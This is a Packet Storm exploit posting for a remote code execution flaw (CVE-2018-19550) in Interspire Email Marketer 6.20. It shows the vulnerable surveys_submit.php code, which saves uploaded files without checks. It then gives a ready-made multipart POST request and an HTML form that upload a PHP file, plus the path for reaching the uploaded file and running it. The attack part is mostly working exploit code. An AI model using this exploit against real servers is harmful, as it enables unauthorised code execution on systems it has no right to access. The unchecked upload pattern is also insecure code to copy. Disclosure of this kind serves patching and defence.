exploit the possibilities

Interspire Email Marketer 6.20 Remote Code Execution

Interspire Email Marketer 6.20 Remote Code Execution
Posted May 23, 2019
Authored by numan turle

Interspire Email Marketer version 6.20 suffers from a remote code execution vulnerability in surveys_submit.php.

tags | exploit, remote, php, code execution
advisories | CVE-2018-19550
MD5 | b195e66a0ac9e8901e18bb374e2f4d7a

Interspire Email Marketer 6.20 Remote Code Execution

Change Mirror Download
# Exploit Title: Interspire Email Marketer 6.20 - Remote Code Execution
# Date: May 2019
# Exploit Author: Numan Türle
# Vendor Homepage: https://www.interspire.com
# Software Link: https://www.interspire.com/emailmarketer
# Version: 6.20<
# Tested on: windows
# CVE : CVE-2018-19550
# https://medium.com/@numanturle/interspire-email-marketer-6-20-exp-remote-code-execution-via-uplaod-files-27ef002ad813


surveys_submit.php
if (isset($_FILES['widget']['name'])) {
$files = $_FILES['widget']['name'];

foreach ($files as $widgetId => $widget) {
foreach ($widget as $widgetKey => $fields) {
foreach ($fields as $fieldId => $field) {
// gather file information
$name = $_FILES['widget']['name'][$widgetId]['field'][$fieldId]['value'];
$type = $_FILES['widget']['type'][$widgetId]['field'][$fieldId]['value'];
$tmpName = $_FILES['widget']['tmp_name'][$widgetId]['field'][$fieldId]['value'];
$error = $_FILES['widget']['error'][$widgetId]['field'][$fieldId]['value'];
$size = $_FILES['widget']['size'][$widgetId]['field'][$fieldId]['value'];

// if the upload was successful to the temporary folder, move it
if ($error == UPLOAD_ERR_OK) {
$tempdir = TEMP_DIRECTORY;
$upBaseDir = $tempdir . DIRECTORY_SEPARATOR . 'surveys';
$upSurveyDir = $upBaseDir . DIRECTORY_SEPARATOR . $formId;
$upDir = $upSurveyDir . DIRECTORY_SEPARATOR . $response->GetId();

// if the base upload directory doesn't exist create it
if (!is_dir($upBaseDir)) {
mkdir($upBaseDir, 0755);
}

if (!is_dir($upSurveyDir)) {
mkdir($upSurveyDir, 0755);
}

// if the upload directory doesn't exist create it
if (!is_dir($upDir)) {
mkdir($upDir, 0755);
}

// upload the file
move_uploaded_file($tmpName, $upDir . DIRECTORY_SEPARATOR . $name);
}
}
}
}
}

input file name : widget[0][field][][value]
submit : surveys_submit.php?formId=1337


POST /iem/surveys_submit.php?formId=1337 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryF2dckZgrcE306kH2
Content-Length: 340

------WebKitFormBoundaryF2dckZgrcE306kH2
Content-Disposition: form-data; name="widget[0][field][][value]"; filename="info.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>
------WebKitFormBoundaryF2dckZgrcE306kH2
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundaryF2dckZgrcE306kH2-

####

POC

<!DOCTYPE HTML>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<title></title>
</head>
<body>
<form action="http://WEBSITE/surveys_submit.php?formId=1337" method="post" enctype="multipart/form-data">
<input type="file" name="widget[0][field][][value]">
<input type="submit" value="submit" name="submit">
</form>
</body>
</html>

URL : http://{{IEM LINK}}/admin/temp/surveys/1337/{{FUZZING NUMBER}}/{{FILENAME}}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

June 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    1 Files
  • 2
    Jun 2nd
    2 Files
  • 3
    Jun 3rd
    19 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    15 Files
  • 6
    Jun 6th
    12 Files
  • 7
    Jun 7th
    11 Files
  • 8
    Jun 8th
    1 Files
  • 9
    Jun 9th
    1 Files
  • 10
    Jun 10th
    15 Files
  • 11
    Jun 11th
    15 Files
  • 12
    Jun 12th
    15 Files
  • 13
    Jun 13th
    8 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    2 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    18 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    22 Files
  • 20
    Jun 20th
    14 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close